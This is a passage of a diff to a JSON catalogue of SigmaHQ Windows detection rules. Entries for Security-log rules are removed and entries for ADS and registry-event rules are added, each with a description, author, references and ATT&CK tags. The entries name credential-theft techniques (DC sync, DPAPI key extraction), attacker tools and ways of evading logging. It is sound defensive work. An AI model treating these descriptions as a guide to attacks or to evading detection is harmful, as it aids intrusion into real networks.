them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "filename": "win_security_add_remove_computer.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "create_stream_hash_creation_internet_file.yml", + "level": "medium", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" - ], - "tags": "No established tags" - }, - "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", - "value": "Add or Remove Computer from DC" - }, - { - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", - "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_admin_logon.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" - ], - "tags": "No established tags" - }, - "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", - "value": "User with Privileges Logon" - }, - { - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "meta": { - "author": "juju4", - "creation_date": "2017/10/29", - "falsepositive": [ - "Legitimate administrative activity." - ], - "filename": "win_security_admin_rdp_login.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://car.mitre.org/wiki/CAR-2016-04-005", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" ], "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.defense_evasion" ] }, - "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", - "value": "Admin User Remote Logon" + "uuid": "573df571-a223-43bc-846e-3f98da481eca", + "value": "Creation Of a Suspicious ADS File Outside a Browser Download" }, { - "description": "Detects access to $ADMIN share", + "description": "Detects the download of suspicious file type from URLs with IP", + "meta": { + "author": "Nasreddine Bencherchali, Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "create_stream_hash_susp_ip_domains.yml", + "level": "high", + "logsource.category": "create_stream_hash", + "logsource.product": "windows", + "refs": [ + "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "value": "Unusual File Download from Direct IP Address" + }, + { + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "meta": { "author": "Florian Roth", - "creation_date": "2017/03/04", - "falsepositive": [ - "Legitimate administrative activity" - ], - "filename": "win_security_admin_share_access.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", - "value": "Access to ADMIN$ Share" - }, - { - "description": "Detects WRITE_DAC access to a domain object", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/09/12", + "creation_date": "2022/08/24", "falsepositive": [ "Unknown" ], - "filename": "win_security_ad_object_writedac_access.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "create_stream_hash_hacktool_download.yml", + "level": "high", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", - "value": "AD Object WriteDAC Access" + "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", + "value": "Hacktool Download" }, { - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/07/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_ad_replication_non_machine_account.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.006" - ] - }, - "uuid": "17d619c1-e020-4347-957e-1d1207455c93", - "value": "Active Directory Replication from Non Machine Account" - }, - { - "description": "Detects access to a domain user from a non-machine account", - "meta": { - "author": "Maxime Thiebaut (@0xThiebaut)", - "creation_date": "2020/03/30", - "falsepositive": [ - "Administrators configuring new users." - ], - "filename": "win_security_ad_user_enumeration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", - "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", - "value": "AD User Enumeration" - }, - { - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_active_directory_user_control.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "value": "Enabled User Right in AD to Control User Objects" - }, - { - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/04/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_ad_user_backdoors.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://msdn.microsoft.com/en-us/library/cc220234.aspx", - "https://adsecurity.org/?p=3466", - "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ] - }, - "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "value": "Active Directory User Backdoors" - }, - { - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "meta": { - "author": "@neu5ron", - "creation_date": "2017/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_alert_enable_weak_encryption.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2053", - "https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "value": "Weak Encryption Enabled and Kerberoast" - }, - { - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/05/31", - "falsepositive": [ - "Go utilities that use staaldraad awesome NTLM library" - ], - "filename": "win_security_alert_ruler.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/sensepost/ruler", - "https://github.com/sensepost/ruler/issues/47", - "https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ruler.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" - ] - }, - "uuid": "24549159-ac1b-479c-8175-d42aea947cae", - "value": "Hacktool Ruler" - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_apt_chafer_mar18_security.yml", - "level": "critical", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", - "value": "Chafer Activity - Security" - }, - { - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "meta": { - "author": "Florian Roth, Bartlomiej Czyz (@bczyz1)", - "creation_date": "2019/03/04", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_apt_slingshot.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/apt-slingshot/84312/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_slingshot.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" - ] - }, - "uuid": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "value": "Defrag Deactivation - Security" - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2019/12/20", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "filename": "win_security_apt_wocao.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "value": "Operation Wocao Activity - Security" - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_atsvc_task.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ] - }, - "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "value": "Remote Task Creation via ATSVC Named Pipe" - }, - { - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_camera_microphone_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "value": "Processes Accessing the Microphone and Webcam" - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_cobaltstrike_service_installs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", - "value": "CobaltStrike Service Installations - Security" - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "meta": { - "author": "OTR (Open Threat Research)", - "creation_date": "2018/11/28", - "falsepositive": [ - "Domain Controllers acting as printer servers too? :)" - ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "value": "DCERPC SMB Spoolss Named Pipe" - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ] - }, - "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" - }, - { - "description": "Detects Mimikatz DC sync security events", - "meta": { - "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "author": "Florian Roth, @0xrawsec", "creation_date": "2018/06/03", "falsepositive": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], - "filename": "win_security_dcsync.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "create_stream_hash_ads_executable.yml", + "level": "medium", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ] - }, - "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "value": "Mimikatz DC Sync" - }, - { - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "meta": { - "author": "@BarryShooshooga", - "creation_date": "2019/10/26", - "falsepositive": [ - "Intended inclusions by administrator" - ], - "filename": "win_security_defender_bypass.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "value": "Windows Defender Exclusion Set" + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS" }, { - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_device_installation_blocked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" - ], - "tags": "No established tags" - }, - "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", - "value": "Device Installation Blocked" - }, - { - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", + "author": "omkar72", + "creation_date": "2020/10/25", "falsepositive": [ "Unlikely" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "registry_event_office_test_regadd.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.t1137.002" ] }, - "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "value": "DiagTrackEoP Default Login Username" + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test" }, { - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "description": "Detects actions caused by the RedMimicry Winnti playbook", "meta": { - "author": "@neu5ron", - "creation_date": "2017/11/19", + "author": "Alexander Rausch", + "creation_date": "2020/06/24", "falsepositive": [ "Unknown" ], - "filename": "win_security_disable_event_logging.yml", + "filename": "registry_event_redmimicry_winnti_reg.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", - "value": "Disabling Windows Event Auditing" - }, - { - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ] - }, - "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "value": "DPAPI Domain Backup Key Extraction" - }, - { - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ] - }, - "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", - "value": "DPAPI Domain Master Key Backup Attempt" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_etw_modification.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - "https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" ], "tags": [ "attack.defense_evasion", "attack.t1112" ] }, - "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", - "value": "COMPlus_ETWEnabled Registry Modification" + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation" }, { - "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", "meta": { - "author": "Saw Winn Naung", - "creation_date": "2021/08/15", + "author": "Den Iuzvyk", + "creation_date": "2020/06/07", "falsepositive": [ - "Legitimate administrative activity" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "filename": "win_security_event_log_cleared.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_event_susp_mic_cam_access.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" ], "tags": [ - "attack.t1070.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ] }, - "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", - "value": "Security Event Log Cleared" + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access" }, { - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", "meta": { - "author": "INIT_6", - "creation_date": "2021/07/02", + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/06/22", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "filename": "registry_event_portproxy_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key" + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "meta": { + "author": "frack113", + "creation_date": "2021/11/18", "falsepositive": [ "Unknown" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "registry_event_persistence_recycle_bin.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/INIT_3/status/1410662463641731075", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://persistence-info.github.io/Data/recyclebin.html", + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin" + }, + { 